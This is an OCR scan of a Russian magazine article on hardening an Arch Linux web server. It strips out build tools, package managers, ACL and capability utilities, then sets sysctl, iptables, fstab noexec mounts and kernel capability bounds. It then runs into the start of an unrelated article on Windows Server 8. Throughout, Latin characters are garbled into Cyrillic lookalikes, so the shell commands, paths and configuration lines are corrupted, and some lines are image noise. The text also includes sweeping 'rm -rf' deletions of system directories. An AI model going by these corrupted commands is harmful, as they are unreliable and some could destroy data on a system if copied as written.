изменения в/ЬооІ/ 
дгиЬ/тепи.ІзІ, то 
есть «обезличить» 
дистрибутив. 
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Лечебное обрезание 



ащиту операционной системы принято строить послойно. 
Первый, внешний слой отвечает за взаимодействие ОС 
с внешним миром, то есть этот слой составляют сетевые 
сервисы, которые слушают определенные порты и отвечают на 
запросы клиентов. К таким сервисам относятся любые демоны, 
способные принимать сетевые сообщения, например ѵѵеЬ- и Нр- 
сервера, сервер 0Ы5, почтовый сервер и т. д. Защиту этого слоя 
обеспечивают программисты, которые следятза безопасностью 
кода, и администратор, своевременно накладывающий заплатки 
и правильно конфигурирующий сетевые сервисы. Второй слой, 
или рубеж обороны, — это сама система, которая не должна по- 
зволить взломщику добраться до конфиденциальных данных или 
изменить важные системные файлы в случае нарушения границ 
первого слоя. 

В идеале второму слою защиты нужно уделять не меньше 
внимания, чем первому, однако многие сисадмины пренебрегают 
этим, предпочитая полагаться на разработчиков дистрибути- 
ва, которые якобы уже позаботились о надежной защите своих 
продуктов. Это, конечно же, не так. Современные дистрибутивы 
— это универсальные операционные системы, рассчитанные на 
применение в самых разных областях и на решение различных 
задач. В них входит множество компонентов, которые создают 
потенциальную опасность и при этом вряд ли когда-нибудь тебе 
понадобятся. Многие дистрибутивы по умолчанию включают в 
себя средства сборки приложений, различные сетевые и диагно- 
стические инструменты, каждый из которых может использовать 
взломщик. 

Самый верный способ обезопасить сервер в этой ситуации — 
это самому создать дистрибутив, ориентированный на решение 
конкретной задачи и лишенный всех тех компонентов, которые 
взломщик может использовать для получения сведений о систе- 
ме, повышения своих прав или установки бэкдора. 



ЧАСТЫ. ПОСТАНОВКА ЗАДАЧИ 



Итак, мы решили сделать свой профильный дистрибутив. Пре- 
жде всего мы должны определиться с функциями, которые будет 
выполнять ОС. Здесь можно придумать массу вариантов, но я 
предлагаю остановиться на самом распространенном: дистрибу- 
тив для ѵѵеЬ-сервера. Наш будущий дистрибутив будет отвечать 
за хостинг ѵѵеЬ-сайтов, причем не статических, а написанных с 
использованием фреймворка 0)апдо. Почему не РНР+0)оотІа/ 
йгираі? Да потому, что я их не люблю! 

Таким образом, в дистрибутив должны входить как минимум 
пять сервисов: 

1. Сам ѵѵеЬ-сервер (к черту АрасЬе, пдіпх — наше все). 

2 . Дистрибутив РуіЬоп, который будет отвечатьза работу 0)апдо. 

3. 0)апдо, на котором будут написаны сайты. 

4 . Роз1дге5С|1_, которая будетхранить данные. 

5 . 55Н для удаленногоуправления. 



МНОГИЕ ДИСТРИБУТИВЫ ПО 
УМОЛЧАНИЮ ВКЛЮЧАЮТ 
В СЕБЯ СРЕДСТВА СБОРКИ 
ПРИЛОЖЕНИЙ, РАЗЛИЧНЫЕ 
ИНСТРУМЕНТЫ, КАЖДЫЙ 
ИЗ КОТОРЫХ МОЖЕТ 
ИСПОЛЬЗОВАТЬ ВЗЛОМЩИК 

Все остальные компоненты типичного сервера, такие как 
РТР-сервер, зепсітаіі, и прочую шелуху можно выкинуть. Чем 
меньше в системе лишних сервисов, тем меньше шансов у взлом- 
щика. 



ЧАСТЬ 2. ПОДГОТОВКА КАРКАСА 



Существует множество способов собрать собственный дистрибу- 
тив в домашних условиях, но все они требуют времени и терпе- 
ния. Мы поступим проще: возьмем обычный Ыпих-дистрибутив 
и вырежем из него все лишнее. На роль подопытного хорошо 
подойдет АгсШпих, один из самых простых и легких дистрибу- 
тивов (ты, конечно, можешь выбрать что-нибудь другое вроде 
ЗІаскѵѵаге или Сепіоо, но сути это не поменяет). 

Получить базовую версию АгсШпих можно, например, с сервера 
Ѵапбех (прямой линк на х86_64-сборку: бНр://доо.д1/Е2РЩ ). По- 
сле загрузки 150-образ следует скормить виртуальной машине и 
установить дистрибутив на виртуальный жесткий диск. Проблем 
во время установки возникнуть не должно: запускаем инсталлятор 
командой /агсб/зеіир, выбираем «Беіесі Зоигсе», жмем <ЕпІег>, вы- 
бираем «Ргераге ЬагсІ сігіѵеіз)», в ответ на все вопросы жмем <ЕпІег>, 
в последнем окне выбираем ФС ехі2. Далее «5еІесІ Раскадез», 
<ЕпІег> в ответ на все вопросы. Затем выбираем «СопЯдиге зузіет», 
жмем <Еп1ег>, в следующем окне выбираем йопе. Выбираем «ІпзІаІІ 
ЬооІІоасІег», выходим из редактора, а когда получаем предложение 
изменить /Ьооі/дгиЬ.сопб жмем <ЕпІег> и, наконец, «Ехіі іпзіаіі». 
Перезагружаем машину (не забываем отключить 150-образ). 

После установки системы и загрузки виртуальной машины 
заходим в систему под учетной записью гооі (пустой пароль) и 
начинаем разбираться с содержимым системы. Прежде всего не- 
обходимо обновить все ее пакеты. Но сначала следует настроить 
сеть. Нормальные виртуалки имеют встроенный йНСР-сервер, 
поэтому обычно достаточно только запустить йНСР-клиент: 





ПггП І-Ьтк 

Бііс'іі і'-гі-Н 1 і ійіѵ 

■«ЮІ Г ■ I Г . Ч ЗЦ] «і 

Пли Пш ілеЕМі- СРііП ІШ Р 

1>дгѵ!ипгг ІттІ мгчп 1 1 мп ЧГЙТ К 

кЬегі 

Рім-Т ГНГ 

РТТМ 17413 «О ЕЙ II црііѵпз 
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# сііісрссі еіІпѲ 

Теперь, чтобы указать менеджеру Растап на нужный репози- 
торий, добавляем в файл /ек/растап.сі/тіггогіізі две строки: 

Бегѵег = Т1:р://тіггог .уапсіех. ги/агсІі1іпих/$геро/о5/$агсІі 
Бегѵег = Іп1:1:р://гпіггог.уапсІех. ги/агсІі1іпих/$геро/ 
оз/$агсІі 

И запускаем процесс обновления: 

# растап -Буи 

Возможно, при первом запуске обновится только сам Растап. 
В этом случае следует выполнить команду второй раз. Далее 
устанавливаем необходимые для функционирования сер- 
вера компоненты. В моем случае это пдіпх, РуіЬоп, 0)апдо и 
Роз1дге5С11_: 

# растап -5 п§іпх ру1:Ііоп2 сІдап§о 

Запоминаем, какие зависимости были установлены в про- 
цессе (чтобы ненароком не удалить их на следующем этапе 
ковыряния). У меня получилось всего четыре зависимости: ІіЫТі, 
розІдгездІ-ПЬз, ІіЬхтІ2 и здІіІеЗ, но ее как раз можно удалить, 
поскольку есть Постгрес. Делаем снимок состояния диска вирту- 
альной машины (это очень важно). При необходимости выключа- 
ем ВМ, делаем снимок и снова включаем. 

Теперь мы должны удалить все лишние пакеты. Для начала 
выясним, что вообще сейчас установлено: 

# растап -С^з 

Список не такой уж и длинный, но больше половины из всего 
вышеперечисленного нам точно не нужно. Во-первых, мы долж- 
ны избавиться от инструментов сборки. По умолчанию в Арче нет 
6СС, но зато есть пакет Ьіпиіііз, который содержит линковщик, 
архиватор статических библиотек и другие инструменты: 

# р аста п -К Ьіпиііііз 

Далее удалим ненужные пакеты, например документацию и 
тап-страницы: 

# растап -К Іісепзез §го-РТ тап-сІЬ тап-ра§ез іехіп-Ро 

Избавимся также от инструментов управления различными 
файловыми системами и настройки РАЮ-массивов. Те из них, 
которые могут быть нужны на сервере, оставим на месте: 



ХАКЕРЫ ОЧЕНЬ 
ЛЮБЯТ ИСПОЛЬЗОВАТЬ 
РАЗЛИЧНЫЕ УТИЛИТЫ 
ДЛЯ МАНИПУЛИРОВАНИЯ 
РАСШИРЕННЫМИ АТРИБУТАМИ 
ФАЙЛОВОЙ СИСТЕМЫ, 
ПРАВАМИ АСЬ И Т.П. 




ІГи (Ив иг іпі №Л иг гѵ от Іѵ піѵ.І|«Лі нш. 
ЬиАІОмъ 41 ій СИ ГЕН ЕЙ « 1 ( 11 . 



Ѵіт ГМ вмйиКі ЬѵСивтп 



1 Пяпи-а I Іи ГігІЬІІй* ІІіг 4 »і - 1 ѵс-ь 

ГѴ-пч* I Іц СачГ І д*гс ЬІкН іаиібві. М *рД «ачНр-эІяЕі: 



апи 



гиішл | |ц і 
1л I ІЪ йиі 



иі .1 Г I Іе-ЦІІІМі ЧцСт ЛПп'Е ІЙ .Ій іЫіІ 

ГІІІГП Ѣа ГІЯ ІИ 




В окне, предлагающем варианты разбивки диска, следует выбрать весь диск 



# растап -К сгурізеіир сіеѵісе-таррег 1ѵт2 тсіасіт \ 

х-Рзрго§з д-РзиііІз геізег-Рзрго§з 

Далее можно избавиться от неиспользуемых инструментов 
управления сетью и связанных с ними библиотек и зависимостей: 

# растап -К іриііііз кеуиііііз кгЬБ беігіоот-таііх рррТ\ 

ы§е1: сІЬиз-соге мра_зирр1ісап1: ІіЬрсар ІіЬпЗ^ІіЬІсІар 

Различные утилиты для управления ІІБВ-оборудованием, РСІ- 
и РСМСІА-устройствами на сервере нам тоже не нужны: 

# растап -К изЬиііІз рстсіаиііііз зуз-РзиііІз 

Также можно избавиться от некоторых оставшихся библиотек: 

# растап -К ІіЬріреІіпе ІіЬза з І ІіЬ^сгѵрІ: 1іЬ§ р § - еггог 

На этом процесс подготовки закончен, и мы можем перехо- 
дить к основной задаче. 



ЧАСТЬ 3. РЕЖЕМ ВСЕ, ЧТО УШЛО ИЗ-ПОД НОЖА 



Мы удалили только малую часть того, что не потребуется на 
сервере, однако другие пакеты и зависимости дистрибутива 
также содержат множество ненужных библиотек и утилит. Сей- 
час мы пройдемся по системе и попробуем избавиться от всего 
лишнего. 

А лишнего много. Например, АгсШпих не разделяет пакеты 
на -сіеѵ и бинарные, поэтому каталог /изг/іпсіисіе содержит в себе 
множество совершенно бесполезных и даже опасных заголовоч- 
ных файлов. Избавимся от них с помощью следующей простой 
команды: 

# гт^-г-Р /изг/іпсіисіе 

По той же причине каталог /изг/ПЬ содержит большое коли- 
чество статических библиотек, которые не нужны для работы 
системы, но могут быть использованы для сборки софта. Удаляем 
их: 

# гт /изг/1іЬ/*.а 

В каталогах/Ып, /зЫп, /изг/Ьіп, /изг/зЬіп имеется множество 
утилит и команд, которые были установлены как часть других па- 
кетов, но сами по себе могут нанести вред серверу. В качестве при- 
мера можно привести различные утилиты для манипулирования 
файловой системой и таблицей разделов, утилиты для управления 
расширенными атрибутами файлов, создания пакетов и т. д. На 
работающем настроенном сервере пользы от них не так много. 
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Лечебное обрезание 



Для начала избавимся от низкуровневых утилит управления # гт^/изг/зЬіп/сЬсоп 

файловой системой: 



# гт / 5 Ь і п / { Ь а сі Ы о с к 5 л сі е Ь и § -Р 5 д сі и т р е 2 -Р 5 л е 2 і т а § е д е 2 1 а Ь е 1 д 
е2ипсІОд гезІ2е2Тз д 1:ипе2Т5} 

Теперь удалим инструменты управления таблицей разделов. 
Вряд ли взломщик будет их использовать, но чем черт не шутит: 



На этом можно было бы остановиться, но Арч по умолчанию 
содержит набор инструментов сгаскІіЬ, который необходим для 
некоторых (весьма полезных, кстати) модулей РАМ, но при этом 
может быть использован для взлома паролей. Его, естественно, 
лучше удалить: 



# г т /изг/зЬіп/сгаскИЬ* 

# гт /5Ьіп/{-РсІІ5к. с-РсІізк. 5-РсІІ5к} # гт -г-Р /изг/зЬаге/{сгаск1іЬ.сІіс1:} 



Также можно избавиться от утилит для создания файловых В завершение удаляем менеджер пакетов. Да -да, все что 

систем и зѵѵар-разделов: нужно мы уже установили, а для обновления дистрибутива будем 

использовать метод, приведенный в конце статьи. 



# пт) /зЫп/ткТз . * 

# гт /зЫп/ткзцар 

Заодно удалим 66 и іпзіаіі: 

# гт /Ьіп/{сісід іпзііаіі} 

Теперь самое важное. Хакеры очень любят использовать раз- 
личные утилиты для манипулирования расширенными атрибу- 
тами файловой системы, правами АСІ_, файловыми сараЫІШез 
для защиты своих файлов от удаления/модификации или для де- 
легирования приложениям расширенных прав доступа. Многие 
админы могут даже не знать обо всех этих методах, поэтому они 
пользуются особой популярностью. К счастью, мы можем защи- 
тить себя от подобных махинаций, просто удалив такие утилиты 
(вообще-то, они распространяются в отдельных пакетах, но кро- 
ме самих утилит эти пакеты включают в себя еще и библиотеки, 
необходимые для работы других нужных нам софтин). 

Итак, избавляемся от утилит управления мандатными права- 
ми доступа (пакет асі): 



# гт /іі5г/Ьіп/растап* 

# гт /іі5г/Ьіп/такеркЕг 

# гт /еііс/растап* 

# гт -гТ /ѵаг/сасііе/растап 

Ну и подчистим разные ненужности. Например, удалим фай- 
лы, требующиеся для сборки образа іпіігсі: 

# гт^-г-Р ^ІіЬ/іпіТсріо 

Уберем из системы ненужные каталоги: 

# гпт^-г-Р /тесііа /орі: /изг/іосаі 

Удалим ядро с отладочной информацией (вместе с каталогом 
/изг/згс): 

# гпт^-г-Р /изг/згс 



Теперь, когда мы избавились от лишнего софта, можно 

# гт /изг/Ьіп/{сЬас1.^е1:Тас1.5е1:Тас1} пройтись по каталогам /ІіЬ /изг/ПЬ и удалить неиспользуемые 

библиотеки (вряд ли их будет много, но лучше сделать это). Спи- 

Далее удаляем утилиты для манипулирования расширенными сок нужных библиотек можно получить с помощью следующей 

атрибутами файлов (пакет аиг): команды: 



# гт /изг/Ьіп/{сЬа1:1:г Лзаііііг. §е1:-Ра1:1:г. зеіі-раііііг} 

И конечно же, утилиты управления сараЫШез (пакет ІіЬсар): 

# гт /изг/зЬіп/{§е1:сар., зе1:сар} 

Также отправим в /беѵ/пиІІ утилиту для изменения контекста 
безопасности: 



хаг%з 166 | 


§гер 


' \ . 50 ' |\ 


с и* -сі 


-Т 1 | 


зесі '5/П иі*//' І\ 


зогі: 1 ипіц 



Его можно сохранить в файле и с помощью команды сШ срав- 
нить с выводом команды «І5 -1 /ІіЬ /изг/ПЬ». Все не совпадающие 
библиотеки можно смело удалять. 
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Списокзависимых библиотек можно получитьс помощью ІсІсІ 



Устанавливаем нужный софт 
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5УЫ\АСК 



ЧАСТЬ 4. НАСТРАИВАЕМ СЕРВЕР 



Теперь у нас есть система, очищенная от хлама, но к работе она 
пока не готова. Сейчас мы должны настроить сервер, то есть 
пдіпх, Постгрес, 0)апдо и другие компоненты. Как это сделать, 
я рассказывать не буду, все уже описано до меня. Скажу только, 
что корнем веб-сервера и О)апдо-проектов следует сделать 
какой-нибудь каталог в корне файловой системы, например 
/ѵѵѵѵѵѵ (в нем можно создать два каталога: Шр — статика и 
ф'апдо — скрипты). Это необходимо для того, чтобы в дальней- 
шем со строгими ограничениями смонтировать для каталога 
отдельный раздел. 

Чтобы все работало, выполним базовую настройку системы 
и добавим в автозагрузку пдіпх и остальные демоны. АгсШпих 
не делает это автоматически, поэтому придется править /еіс/ 
гс.сопі: 

# Имя хоста 

Н05ТІ\ІАМЕ="ехатр1е . сот" 



# Настройка сетевого интерфейса 

Іп1;ег-Расе=е1:1і0 

асИге55=1.2.3.4 

пеіта5к=255. 255. 255.0 

ЬгоасІса5І:=1.2.3.4 

§аіемау=1 .2.3.4 



# Запускаемые при старте системы демоны 

РАЕМОІМ5=(Ііі\/с1оск бѵбіо^-п^ пеііл/огк сгопсі роБігезд! п^іпх) 

Для индивидуального запуска/остановки демонов можно ис- 
пользовать скрипты каталога /еіс/гс.сі, например: 

# /еіс/гс .сІ/п§іпх гезіагі: 

Далее мы должны предпринять некоторые меры по обеспече- 
нию внешней безопасности сервера. Статья, конечно, не об этом, 
но о базовой настройке рассказать все же стоит. Во-первых, 
установим пароль для рута: 

# раззысі 

Во-вторых, заведем непривилегированного пользователя: 

# изегасісі ѵазуа 

В-третьих, отключим гооі-логин по 55Н: 

# есііо 1 Регті1:Коо1:І.о%іп по' > /ѳіс/ббіі/ббіісісопіі^ 

# /еіс/гс . сі/ббіісі геБіагІ: 

Теперь отредактируем БузсІІ.сопІ, чтобы применить несколько 
классических техник защиты: 

# Отключаем форвардинг пакетов 

пе1:.ірѵ4.ір Тонл/агсІ = 0 

# Включаем верификация маршрута пакета 

пеі: . ірѵ4. сопТ . сІе-Ра иІІ: . грбііег = 1 
пе1:.ірѵ4.соп-р.сІе-Раи11:.ассер1:_5оигсе_гои1:е = 0 

# Уменьшаем количество повторных передач 5УІМАСК 

пеі: . Ірѵ4.1:ср_5упаск_ге1:гіе5 = 2 

# Отключаем редиректы 

пеі: . ірѵ4. соп-р. а 11 . ассер1:_гесІігес1:5^ 0 

пеі: . ірѵ4. сопТ. аіі . 5есипе_гесІігес1:5 = 0 

# Игнорируем широковещательные РІІМб-запросы 

пеі: . ірѵ4. істр есИо і^поге ЬгоасІсаБІБ = 1 

# Защита от 5 УІМ- флѵда 

пеі:. ірѵ4.1:ср_5упсоокіе5 = 1 



Настроим брандмауэр так, чтобы открытыми оставались толь- 
ко порты 22 и 80 (55Н и НИР): 

# Стандартная политика 

іріаЬІеБ -Р ІІЧРІІТ РКОР 

іріаЬІеБ -А ІІЧРІЛ ^і Іо ^д АССЕРТ 

# Небольшая зашита от Ро5 

іріаЬІеБ -А ІІМРЦТ -р іср -т іср - -1:ср-11а)55 \ 

5УІ\П АСК ^ РІІ\Д К5Т К5Т -т І ітіі: --Іітіі: 1/5 -д АССЕРТ 

# Разрешаем уже установленные соединения 

іріаЬІеБ -А ІМРІЛ -р аіі -т Біаіе --Біаіе^ 

КЕІ_АТЕР,Е5ТАВІ_І5НЕР -д АССЕРТ 

# Наши порты 

іріаЬІеБ -А ІІМРЦТ -і е1:И0 -р іср - -сірогі: 22 -і АССЕРТ 
іріаЬІеБ -А ІІМРЦТ -і е1:ИѲ -р іср - -сірогі: 80 -і АССЕРТ 



# Разрешаем некоторые ІСМР-сообщения 

іріаЬІеБ -А ІМРІІТ -і еі: М0 -р істр чп істрТ\ 

--істр-іуре 3 -д АССЕРТ 
іріаЬІеБ -А ІМРІІТ -і еіІіѲ -р істр -т іс тр \ 

--і стр- іѵре 11 -д АССЕРТ 

іріаЫез -А ІІМРЦТ -і еіІіѲ -р істр -т істр \ 

--істр-іѵре 12 -д АССЕРТ 

И последняя, но очень важная настройка: запрет на выполне- 
ние системных действий после окончания загрузки дистрибутива. 

# есііо ' есііо $( (ѲхТТТТТТТТ А (1 << 16))) > \ 

/ргос/5у5/кегпе1/сар-ЬоипсГ >> /еіс/гс . Іосаі 

# есііо 'есііо $( (ѲхТТТТТТТТ л (1 18))) > \ 

/ргос/зуз/кегпеІ/сар-ЬоипсІ ' >> /еТс/гс . Іосаі 

# есііо 'есііо $( (ѲхТТТТТТТТ л (1 << 19))) > \ 

/ргос/5Ѵ5/кегпе1/сар-ЬоипсГ >> /еіс/гс . Іосаі 

# есііо ' есііо $( (ѲхТТТТТТТТ л (1 << 21))) > \ 

/ргос/5у5/кегпе1/сар-ЬоипсГ >> /еТс/гс . Іосаі 

Эти строки добавляют в ядро после загрузки ограничения 
на загрузку модулей (для защиты от бэкдоров и руткитов), на 
выполнение системного вызова сіігооі, на выполнение рігасе, 
то есть на трассировку процессов, и на различные системные 
действия, например на монтирование файловых систем и под- 
ключение зѵѵар. Пока система не будет перезагружена, отменить 
ограничения не сможет никто, включая гооі. 



ЧАСТЬ 5. ПЕРЕНОС СИСТЕМЫ НА СЕРВЕР И 
ОКОНЧАТЕЛЬНАЯ НАСТРОЙКА 



Все, теперь у нас есть ми ни мал истинный Ыпих-дистрибутив, 
выполняющий строго определенные функции, но как установить 
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Список установленных пакетов 
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Лечебное обрезание 



его на реальный сервер? Очень просто — скопировать. Для этого 
понадобятся установочный образ АгсЫіпих, чистая болванка, 
флешка и немного терпения. Выполняем весь процесс какуказано 
ниже. 

1. Завершаем работу виртуальной машины. 

2. Настраиваем ее загрузку с 150 -образа АгсЫіпих, вставляем в 
комп флешку и прокидываем ее в виртуальную машину (с по- 
мощью ѴігІиаІВох это легко сделать). 

3. Подключаем разделы дистрибутива к каталогу /тпі. На моем 
виртуальном диске было три раздела: /сІеѵ/зсІаЗ - корень, /б еѵ/ 
зсіаі -/Ьоо1,/сІеѵ/5СІа4 - /боте. Монтируем: 

# тоипі: /сІеѵ/зсІаЗ /тпі: 

# тоипі: /сіеѵ/зсіаі /тпІі/ЬооІ: 

# тоипі: /сІеѵ/5СІа4 /тп1:/Ііоте 

4. Подключаем флешку к каталогу/тесііа: 

# тоипі: /сІеѵ/5сІЫ_/тесІіа 

5. Запаковываем систему в архив и кладем его на флешку: 

# ссі /тпі: 

# 1:а г -С 2 -Р /тесііа/гооі: .1:ап.§2 . 

# зупс 

6. Завершаем работу виртуальной машины, нарезаем 150 -образ 
АгсЫіпих на болванку и идем к серверу, прихватив с собой 
флешку и болванку. 

7. Загружаем сервер с болванки и разбиваем диск с помощью 
сІсПзк, руководствуясь следующей схемой: 

зсіаі - зыар (размер: объем ОЗУ * 2); 

5сІа2 - корень (размер: 1 Гб); 

БСІаЗ - /млм (размер: столько, сколько нужно для 
хранения всех файлов веб-сайта); 

5СІа4 -_/ѵаг (размер: от 1 Гб). 

8. Создаем в разделах файловые системы: 

# тк-р5.ех1:4 /с!еѵ/5с1а{2 . 3 .4} 

9. Монтируем разделы к/тпі: 

# тоипі: /сІеѵ/5СІа2„/тп1: 

# тк(Иг /тп1:/ыыы /тп1:/ѵаг 

# тоипі: /сІеѵ/зсІаЗ /тп1:/ыыы 

# тоипі: 7сІеѵ/5сІа4 /тпі/ѵаг 

10. Монтируем флешку и распаковываем архив с системой: 

# тоипі: /сІеѵ/зсІЫ /т есііа 

# ссі /тпі: 

# “Ьаг -Х 2 ~Р /тесііа/гооі: Лаг . 

11. Устанавливаем загрузчик: 

# сЫооѣ^/тпІ: 

# §гиЬ-іп5І:а11 / сіеѵ/зсіаі 

12. Правим кон фи г за грузчика: 

ЫЫе Агсб І_іпих 
гооі: ( ИсІѲ ^ 1 ) 

кегпеі /Ьоо1:/ѵт1іпи230 гоо1:=/сІеѵ/5сІаб го 
Іпі1:гс1 /Ьоо1:/кегпе130 . іт^ 



ЕСЛИ ВЗЛОМЩИК ПРОНИКНЕТ 
В СИСТЕМУ ЧЕРЕЗ ДЫРУ В 
ВЕБ-СЕРВЕРЕ И ПОЛУЧИТ 
ПРАВА ПОЛЬЗОВАТЕЛЯ 
жѵт, ОН ДАЖЕ НЕ СМОЖЕТ 
ЗАПУСТИТЬ ЭКСПЛОЙТ 

13. Правим /еІс/ІБІаЬ следующим образом: 

сІеѵр1:5^сІеѵ/р1:5 сіеѵрѣз сіе-раиіѣз 0 0 

БІіт /сіеѵ/зііт Ітр-рБ п осіеѵ. поз иісі 0 0 

/сіеѵ/зсіаі змар змар сіе-раиіѣз 0 0 

/с!еѵ/$сІа2 / ех1:4 сІе-РаиЗ/Ьз 0 1 

/сІеѵ/зсІаЗ ех1:4 сІе-Раи11:5 . поехес . посіеѵ 0 1 

/с1еу/зс1а4 /ѵаг ех1:4 сІе-Раи11:5 . поехес . посіеѵ 0 1 

Ѣтр-Рз /1:тр Ѣтр-Рз сІе-Раи11:5 л поехес., посіеѵ 0 0 

Каталог /ѵѵѵѵѵѵ будет смонтирован без возможности запуска 
файлов и создания устройств, так что если взломщик проникнет 
в систему через дыру в веб-сервере и получит права пользовате- 
ля ѵѵѵѵѵѵ, он даже не сможет запустить эксплойт. Для каталогов 
/ѵаг и /ітр действуют те же правила. 

Все, теперь можно перезагрузить машину и посмотреть, как 
все работает. 



ЧАСТЬ 6. ОБНОВЛЕНИЕ 



Обновить полученный дистрибутив не так-то просто. Для этого 
потребуется виртуальная машина с установленным АгсЫіпих 
(самое время восстановить снимок, созданный в начале процес- 
са) и ббМб. Процесс выглядиттак: 

1. Включаем виртуальную машину. 

2. Устанавливаем ббМб. 

3. Обновляем базу да иных пакетов и нужные софтины (например, 
пдіпх, Роз1дге50І_, 55Н): 

# растап -5у 

# растап -5 п§іпх ро5І:§ге5д1 ббіі 

4. Запоминаем, какие пакеты обновились, и для всех этих паке- 
тов, включая пдіпх, Роз1дге50І_ и 55Н, смотрим список файлов: 

# растап -(^І п§іпх роз1:§ге5д1 ббіі 

5. Перекидываем файлы на наш сервер с помощью ббМб: 

# ббітГб сервер /тпі: 

# -Гоп біе іп "растап -01 п^іпх | си~Ь -сі ' ' --Р 2": с!о\ 

ср $ б!е /тп1:/$б1е;\ 

сіопе 

Готово! Конечно, это не автоматические обновления каждую 
ночь, но и не ночной кошмар, тем более что весь процесс вполне 
можно реализовать в скрипте. 



ЧАСТЬ 7. ВЫВОДЫ 



В этой статье приведены только базовые сведения о том, как 
обезопасить дистрибутив. Каждый сервер имеет свои особен- 
ности, которые необходимо учитывать. В любом случае главное 
правило: чем меньше компонентов, тем лучше. Ій! 
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5УЫ/АСК 



Сергей «дгіпсіег» Яремчук (дгіпсіегйзупаск.ги) 



Рожденный под 

цифрой 
восемь 




ІШП 



Ѵ!ШН 



Основной процесс 
разработки ѴѴіп8 
планируется 
завершить к лету 
2012 года. Новая ОС 
поступите продажу 
в начале 2013-го. 

Название ѴѴіпсіоѵѵб 
Бегѵег 8 является 
кодовым и еще 
не утверждено 
окончательно. 

В ѴѴіп2к8 5егѵег 
Соге невозможно 
было использовать 
М550І_5егѵег 
или ЕхсЬапде. 
Разработчики 
обещают, что ѴѴіп8 
будет поддерживать 
СУБД. 

Функция Нурег-Ѵ 

Керііса обеспечивает 

асинхронную 

репликацию 

виртуальных 

машин на внешние 

площадки. 



Центр разработки 
ѴѴіпсіоѵѵб Бегѵег — 

тзсіп.тісгозоН. 

сот/еп-иБ/ѵѵіп- 

гіоѵѵББегѵег . 



Ц|»Щ 



На прилагаемом 
к журналу диске 
ты найдешь 
видеоролик, в 
котором показана 
установка и 
первоначальная 
настройка ѴѴіпсіоѵѵб 8 
йеѵеіорег Ргеѵіеѵѵ. 



ЖАКШС 



ѴѴіп8 будет 
выпускаться только 
для 64-разрядных 
систем. 




ЗНАКОМИМСЯ С 
ѴѴШ00Ж5 5ЕРѴЕР 8 



Работа над «восьмеркой», начавшаяся еще в 
2009 году, велась параллельно с разработкой 
ѴѴіп2к8, однако официальной информации 
о новой серверной ОС было совсем мало. 
Разработчики обещали, что ядро будет 
написано с нуля, важную роль в системе 
возьмет на себя гипервизор, а кластерные 
службы станут эффективнее. Как только 
появилась версия йеѵеіорег Ргеѵіеѵѵ, мы решили 
проверить правдивость этих слов. 




ѴѴіп8 получил обновленный Зегѵег Мападег 
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Рожденный под цифрой восемь 




Любые настройки в 6Ш, по сути, сводятся к команде РоѵѵегЗНеІІ 



ВВЕДЕНИЕ 



Современные тенденции диктуют новые правила для разработ- 
чиков операционных систем. Сегодня всё активнее продвигаются 
«облачные» технологии, многие компании уже используют вирту- 
альные структуры (частные «облака») или планируют перейти к 
ним. Большую популярность приобретают виртуальные машины, 
заменяющие целый парк серверов. Сотрудники теперь не привяза- 
ны к конкретному рабочему месту, так как могут получить доступ 
к ресурсам компании из любой точки, где есть выход в интернет. 
Поэтому при создании ѴѴіп8 во главу угла были поставлены четыре 
компонента: сетевая инфраструктура, удаленный доступ, удобство 
управления и виртуализация. 



ИНСТРУМЕНТЫ УПРАВЛЕНИЯ В ѴѴШ0ѴѴ5 8 



Концепцию ѴѴіп2к8 Бегѵег Соге админы приняли благосклонно, 
поскольку отсутствие СШ снижает системные требования (что 
особенно актуально для ѴМ) и повышает уровень безопасности. 
Однако установить можно было только одну из двух версий ОС: с 
СШ или без, изменить версию не представлялось возможным. В 
ѴѴіп8 для сервера доступно три варианта интерфейса: один с СШ 
и два варианта без него. В первой версии без СШ управление осу- 
ществляется с помощью командной строки, а во второй (Реаіигез 
Оп йетапсі) вместо СШ и ІЕ в качестве инструментов управления 
предлагаются Бегѵег Мападег и ММС. Но главное — теперь можно 
легко менять интерфейс без переустановки сервера. Благодаря 
этому ѴѴіп8 можно настроить так, чтобы добиться оптимального 
соотношения между производительностью, безопасностью и удоб- 
ством управления. 

Положительную реакцию у сообщества вызвало появление в 
ѴѴіп2к8 оболочки РоѵѵегБЬеІІ, позволяющей автоматизировать за- 
дачи, обрабатывать большие объемы данных и выполнять команды 
сразу на множестве подчиненных систем. 

ѴѴіп8 получила третью версию РоѵѵегБЬеІІ, которая представля- 
ет собой серьезный инструмент для выполнения задач, связанных 
с администрированием системы, ролей и сервисов. Число команд- 
летов выросло на порядок и составляет уже более 2300 (в Р51 их 
было 130, в Р52 — 230). Технология автодополнения ІпІеІІіБепзе 
превращает Р5 в удобное средство для создания и тестирования 
сценариев. Хорошо поддерживаются операции, выполняющиеся 
длительное время на большом количестве систем. Серьезно пере- 
работанный стек стал более универсальным и переносимым, те- 
перь в командлетах в большинстве случаев не нужно обращаться 
к специфическому АРІ. Для работы с веб-сервисами Р5 использует 



форматы РЕ5Т и 350ІЧ. По сути, многие штатные инструменты 
управления из состава ѴѴіп8 вроде Р5АТ и Бегѵег Мападег пред- 
ставляют собой надстройки над Р5, а работа всех мастеров сво- 
дится к созданию и запуску сценария Р5. При этом выполненный 
ранее сценарий можно скопировать из истории и экспортировать 
для повторного использования. 

Особенностью инструментария ѴѴМІ (ѴѴіпсІоѵѵз Мападетепі 
Іпзігіітепіаііоп) в ѴѴіп8 является поддержка стандартов, описы- 
вающих взаимодействие между оборудованием и приложениями 
вроде 5МІ-5, ѴѴБМАЫ или йСОМ. Соответственно, третьим лицам 
стало проще писать ѴѴМІ-провайдеры. 

Диспетчер сервера в ѴѴіп2к8 мне нравился. Он отлично подхо- 
дил для настройки всевозможных параметров локальной системы, 
а с Р2 позволял настраивать и удаленную. В ѴѴіп8 разработчики 
пошли дальше и ввели понятие группы серверов. Теперь можно 
управлять несколькими серверами одновременно, а в ОазЬЬоагсІ 
выводится информация, собранная со всех систем. Выбрав в спи- 
ске сервер из меню, можно запустить другие средства управления: 
консоль Сотриіег Мападетепі или РоѵѵегБЬеІІ. Практически все 
инструменты администрирования, ранее предлагавшиеся в виде 
отдельных консолей, теперь встроены в диспетчер сервера. Сам 
Бегѵег Мападег выполнен в фирменном стиле Меіго, расположение 
окон оптимизировано для современных ѵѵібе-мониторов. События, 
которые требуют внимания админа, подсвечиваются разными 
цветами. Фильтры помогают отобрать только необходимую инфор- 
мацию, причем запросы можно сохранить и использовать повторно. 

Как и ранее, настройка в основном производится при помо- 
щи мастеров. При установке роли можно выбрать один из двух 
вариантов: роль/компонент или сценарий развертывания РйБ. 
